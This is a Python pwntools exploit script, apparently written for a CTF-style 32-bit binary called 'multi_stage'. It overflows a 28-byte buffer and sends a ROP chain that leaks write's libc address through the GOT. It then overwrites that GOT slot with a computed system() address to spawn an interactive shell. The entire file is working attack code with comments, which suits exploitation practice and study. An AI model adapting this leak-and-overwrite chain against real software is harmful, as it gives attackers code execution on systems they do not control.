#!/usr/bin/python

from pwn import *



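def main(*, binary="./multi_stage", libc_path="/lib/i386-linux-gnu/libc.so.6"):
    """Two-stage ret2plt / GOT-overwrite exploit for the 32-bit ``multi_stage`` binary.

    Stage 1 is a single ROP chain placed after a 28-byte overflow:
      1. write(1, write@GOT, 4)   -> leaks the resolved libc address of ``write``
      2. read(0, write@GOT, 4)    -> lets us overwrite write's GOT slot
      3. write@PLT(ed_string)     -> the slot now holds system(), so this call
                                     is really system(ed_string)
    Stage 2 derives system()'s address from the leak plus the local libc's
    symbol offsets and sends it as the 4 bytes step 2 is blocked on, then
    hands the resulting session to the user.

    Args:
        binary: path of the target executable to spawn.
        libc_path: the libc the target actually loads at runtime; symbol
            offsets are read from this file, so a mismatched build yields a
            wrong system() address and a crash rather than a shell.

    Raises:
        PwnlibException (via ``log.error``): if the leak does not produce a
            page-aligned libc base, which indicates a wrong libc or a wrong
            banner length.
    """
    # Load libc before spawning the target so a bad path fails fast and
    # does not leave a half-exploited process around.
    libc = ELF(libc_path)
    offset_write = libc.symbols["write"]
    offset_system = libc.symbols["system"]

    p = process(binary)

    # Addresses taken from the (non-PIE) target; read@GOT (0x804a00c) is not
    # needed because we re-use write's GOT slot for the system() pointer.
    write_plt = 0x08048320
    write_got = 0x804A014
    read_plt = 0x8048300
    # NOTE(review): presumably the address of a command string handed to
    # system() -- confirm what lives at 0x8049243 in the binary.
    ed_string = 0x8049243
    # Gadget that pops the three call arguments off the stack and returns
    # into the next chain element.
    pop_pop_pop_ret = 0x080484E9

    # 28 bytes of filler reach the saved return address.
    payload = b"A" * 28
    # 1) write(1, write@GOT, 4): leak write's libc address to stdout.
    payload += p32(write_plt)
    payload += p32(pop_pop_pop_ret)
    payload += p32(1)
    payload += p32(write_got)
    payload += p32(4)
    # 2) read(0, write@GOT, 4): wait for stage 2 to supply system()'s address.
    payload += p32(read_plt)
    payload += p32(pop_pop_pop_ret)
    payload += p32(0)
    payload += p32(write_got)
    payload += p32(4)
    # 3) write@PLT now dispatches to system(); 0xdeadbeef is the (never used
    #    on success) return address, ed_string its single argument.
    payload += p32(write_plt)
    payload += p32(0xDEADBEEF)
    payload += p32(ed_string)

    p.send(payload)

    # The leak is the 4 bytes that follow the target's 16-byte banner. recvn
    # blocks until all 20 bytes are in, so a short read cannot hand u32() a
    # truncated slice.
    # NOTE(review): the 16-byte banner length is inherited from the original
    # ``data[16:]`` slice -- confirm against the binary's actual output.
    data = p.recvn(20)
    log.info("Data captured: %s", data)
    leak = data[16:20]
    log.info("Data trimed as : %s", leak)
    write_libc = u32(leak)
    log.info("write_libc: 0x%x", write_libc)

    libc_base = write_libc - offset_write
    # A genuine leak puts the libc base on a page boundary; anything else
    # means the wrong libc build or banner length, and sending a bogus
    # system() address would only crash the target.
    if libc_base & 0xFFF:
        log.error(
            "write@libc 0x%x gives unaligned libc base 0x%x; wrong libc or banner length?",
            write_libc,
            libc_base,
        )
    system_libc = libc_base + offset_system
    log.info("system_libc: 0x%x", system_libc)

    # Stage 2: satisfy the pending read() with system()'s address.
    p.send(p32(system_libc))

    # Pass interaction back to the user.
    p.interactive()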

# Run the exploit only when executed directly, not when imported.
if __name__ == '__main__':
    main()

